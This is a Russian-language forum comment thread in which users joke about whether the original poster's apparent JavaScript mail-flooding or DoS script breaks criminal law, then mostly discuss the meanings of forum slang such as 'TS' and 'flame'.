Так не вредоносные жы! Сплошная польза!
0
Автор поста оценил этот комментарий
По 247 можно сажать все антивирусные компании?
0
Автор поста оценил этот комментарий
Распространение точно нет. А есть ссылочка на правила эксплуатации ЭВМ? А то я уже 27 лет эксплуатирую, а правил не знаю
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

В посте и сам код, и инструкция как им пользоваться есть. Не это ли считается распространением?!

0
Автор поста оценил этот комментарий

если притянут, тут есть лига юристов. я думаю они помогут хорошему человеку.

0
Автор поста оценил этот комментарий
Это Россия,тут возможно все) не удивлюсь,если захотят посадить за такую мелочь)
Автор поста оценил этот комментарий

Тогда может позвать @moderator 'a? Если автора за это можно посадить, то и местных "Робин Гудов" тоже.

Да и вроде в одном из правил написано по поводу нарушения УК.

Автор поста оценил этот комментарий
Да где ж тут вредоносные программы. Обычный dos
раскрыть ветку (2)
2
Автор поста оценил этот комментарий

Во первых ddos и dos - это разные вещи.

Во вторых это не ddos.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

курить до полного просветления, и учиться отличать denial of service от disturbed denial of service


https://en.wikipedia.org/wiki/Denial-of-service_attack

8
Автор поста оценил этот комментарий

Я понял, что ТС опасный парень!

раскрыть ветку (2)
19
Автор поста оценил этот комментарий

Ага, чувак который всё делает на JS опасен :D

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Это как стройбат, настолько опасны, что им даже автомат не дают.

7
Автор поста оценил этот комментарий
Засрал им почту своими расслыками. Молоток
27
DELETED
Автор поста оценил этот комментарий
Так вот как расшифровывается ТС
раскрыть ветку (18)
51
Автор поста оценил этот комментарий

Бля, если б вы это не написали, я бы был дальше в неведении))

раскрыть ветку (15)
17
Автор поста оценил этот комментарий

я тоже стеснялсо спросить... вдруг забанят ещё....

раскрыть ветку (14)
25
Автор поста оценил этот комментарий

@moderatorb, тут стесняшка

4
DELETED
Автор поста оценил этот комментарий
Я загуглить хотел ещё раньше, но было лень, думал так и так в комментариях однажды появится, и вот этот день настал !!! =)
раскрыть ветку (12)
7
Автор поста оценил этот комментарий

Тс, сабж, флуд, оффтоп, флейм, ник, тред, приват, пм, модер, бан, холивар, чат, тролль, кэп... Вам, ребят, только недавно интернет завезли, что ли?)

раскрыть ветку (11)
7
Автор поста оценил этот комментарий

Ей богй - ТС знаю значение, но не знал расшифровки )

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Держи друг - topic starter

3
DELETED
Автор поста оценил этот комментарий
Ну я не совсем динозавр, кроме сокращения ТС все знал, на форумах не сижу, на Пикабу не так давно.
1
Автор поста оценил этот комментарий
А разве приват и ПМ - не одно и то же?
раскрыть ветку (3)
26
Автор поста оценил этот комментарий
Приват это в стриптиз клубе, а пм это пистолет
Автор поста оценил этот комментарий

одно и то же, но я не ставил цели "не повторяться")

Автор поста оценил этот комментарий
Private mesage.
0
Автор поста оценил этот комментарий

Что такое флейм? Впервые вижу

раскрыть ветку (2)
2
Автор поста оценил этот комментарий

бессмысленный спор. переругивание ради переругивания.

0
Автор поста оценил этот комментарий

"поток чрезмерной эмоциональности". типа дохера восклицательных знаков, смайлов, капс и т.д. За него банили на форумах)

0
Автор поста оценил этот комментарий

У нас мало английских сокращений прижилось, разве что в геймерской среде, тот же афк и т.п., у них так все в них, вот пример, когда

My summer holidays were a complete waste of time. Before, we used to go to New York to see my brother, his girlfriend and their 3 kids face to face. I love New York, it’s a great place.

записывают как:

My smmr hols wr CWOT. B4, we used 2go2 NY 2C my bro, his GF & thr 3 :- kids FTF. ILNY, it’s a gr8 plc. ))

11
Автор поста оценил этот комментарий

Topic Starter

раскрыть ветку (1)
0
Автор поста оценил этот комментарий
Или же просто, Автор
раскрыть ветку
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку